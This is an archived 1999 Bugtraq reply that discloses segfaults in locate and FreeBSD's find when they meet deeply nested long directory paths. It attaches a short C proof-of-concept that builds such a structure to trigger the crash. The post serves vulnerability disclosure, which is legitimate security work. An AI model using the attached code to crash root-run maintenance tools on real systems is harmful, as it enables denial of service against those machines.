Bugtraq mailing list archives

Re: Buffer overflow in ftpd and locate bug

From: venglin () LAGOON FREEBSD ORG PL (Przemyslaw Frasunek)
Date: Sun, 2 May 1999 20:37:35 CEST


--Message-Boundary-25450
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body

  I had problem with locate from findutils-4.1.24.rpm from Redhat-5.1
It segfaults if we have huge directory at incoming ftp which created
by exploits for ftpd realpath hole. My ftpd is patched. Those exploits
,i think, should not afraid me, but if updatedb puts to locate database
that directory then locate segfaults. ( getline.c 104 row by gdb )
I guess it can be used for running arbitrary commands if root runs locate.


  I've noticed a similar problem with /usr/bin/find on FreeBSD. By
creating _very_ long and deep directory structure it's possible
to segfault /usr/bin/find (it's also used in /etc/periodic scripts,
which runs on root).

  Example:

  I'm creating a directory structure with 300 subdirectories, each
255 chars length (source in attachment, also it's possible to do it
via ftpd, because it calls mkdir() and chdir()).

lagoon:venglin:/tmp/jc> find example > /dev/null
Segmentation fault (core dumped)

  Gdb shows, that functions puts() was overflowed, when it tried to
print a very long path.

  Also other system tools (rm, ls) has big problems with such
directory structures.

--
* Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
* Inet: venglin () lagoon freebsd org pl ** PGP:D48684904685DF43EA93AFA13BE170BF *
--Message-Boundary-25450
Content-type: text/plain; charset=US-ASCII
Content-disposition: inline
Content-description: Attachment information.

The following section of this message contains a file attachment
prepared for transmission using the Internet MIME message format.
If you are using Pegasus Mail, or any another MIME-compliant system,
you should be able to save it or view it from within your mailer.
If you cannot, please ask your system administrator for assistance.

   ---- File information -----------
     File:  mess.c
     Date:  2 May 1999, 19:01
     Size:  748 bytes.
     Type:  Text

--Message-Boundary-25450
Content-type: Application/Octet-stream; name=mess.c; type=Text
Content-disposition: attachment; filename="mess.c"

#include <stdio.h>
#include <errno.h>
#include <sys/stat.h>
#include <strings.h>

#define DUMP 0x41

main(int argc, char *argv[]) {

        char buf[255];
        int i = 0;

        if (argc < 3) { fprintf(stderr, "usage: %s <dir> <depth>\n", argv[0]); exit(1); }

        if(chdir(argv[1])) { fprintf(stderr, "error in chdir(): %s\n", strerror(errno)); exit(1); }

        memset(buf, DUMP, 255);
        for(i=0;i<(atoi(argv[2]))-1;i++) {
          if(mkdir(buf, (S_IRWXU | S_IRWXG | S_IRWXO))) { fprintf(stderr, "error in mkdir() after %d iterations: %s\n", 
i, strerror(errno)); exit(1); }
          if(chdir(buf)) { fprintf(stderr, "error in chdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); }
        }

        exit(0);
}

--Message-Boundary-25450--

Current thread:

Re: Buffer overflow in ftpd and locate bug [tgo] (Apr 30)
- <Possible follow-ups>
- Re: Buffer overflow in ftpd and locate bug Przemyslaw Frasunek (May 02)
  - Re: Buffer overflow in ftpd and locate bug Eugeny Kuzakov (May 03)
    - Re: Buffer overflow in ftpd and locate bug Andrew Pitman (May 06)
  - CALL FOR PAPERS: EICAR 2000 -- Student Scholarships (fwd) Ken Williams (May 04)
  - portmaper/process table flood exploit? C.J. Oster (May 04)
- Re: Buffer overflow in ftpd and locate bug Crispin Cowan (May 03)